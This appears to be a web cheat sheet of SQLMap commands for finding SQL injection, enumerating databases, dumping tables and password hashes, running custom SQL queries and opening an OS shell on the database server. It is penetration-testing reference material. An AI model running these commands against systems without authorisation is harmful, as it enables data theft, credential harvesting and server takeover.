Code Review In Seconds

Self-Hosted AI Code Reviewer

Hexmos LiveReview AI-Powered Code Review
Live Review
AI-Powered Code Review

SQLMap - SQL Injection Detection Tool

Utilize SQLMap for comprehensive SQL injection detection and exploitation. Learn to identify vulnerabilities, extract database information, and gain shell access with this powerful tool.

SQLMap Usage Examples

SQLMap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It features a detection engine with a vast array of specific exploit payloads covering many database types and operating systems. This section provides practical command-line examples for using SQLMap effectively.

SQL Injection Detection Commands

These commands focus on identifying and confirming SQL injection vulnerabilities in web applications.

# Test URL and POST data and return database banner (if possible)
./sqlmap.py --url="<url>" --data="<post-data>" --banner

# Parse request data and test | request data can be obtained with burp
./sqlmap.py -r <request-file> <options>

# Fingerprint | much more information than banner
./sqlmap.py -r <request-file> --fingerprint

Database Information Extraction

Once a vulnerability is found, these commands help in enumerating and extracting sensitive data from the database.

# Get database username, name, and hostname
./sqlmap.py -r <request-file> --current-user --current-db --hostname

# Check if user is a database admin
./sqlmap.py -r <request-file> --is-dba

# Get database users and password hashes
./sqlmap.py -r <request-file> --users --passwords

# Enumerate databases
./sqlmap.py -r <request-file> --dbs

# List tables for one database
./sqlmap.py -r <request-file> -D <db-name> --tables

# Other database commands
./sqlmap.py -r <request-file> -D <db-name> --columns
					   --schema
					   --count

Data Enumeration and Dumping

Specific commands for targeting tables and columns to extract data.

# Enumeration flags
./sqlmap.py -r <request-file> -D <db-name>
			      -T <tbl-name>
			      -C <col-name>
			      -U <user-name>

# Extract data
./sqlmap.py -r <request-file> -D <db-name> -T <tbl-name> -C <col-name> --dump

Advanced SQLMap Operations

Commands for executing custom SQL queries and gaining operating system access.

# Execute SQL Query
./sqlmap.py -r <request-file> --sql-query="<sql-query>"

# Append/Prepend SQL Queries
./sqlmap.py -r <request-file> --prefix="<sql-query>" --suffix="<sql-query>"

# Get backdoor access to sql server | can give shell access
./sqlmap.py -r <request-file> --os-shell

Further Resources

For more in-depth information and advanced usage, refer to the official SQLMap documentation and resources on web security:

← Back to security cheatsheets All cheatsheets 🙏  Credits & Acknowledgments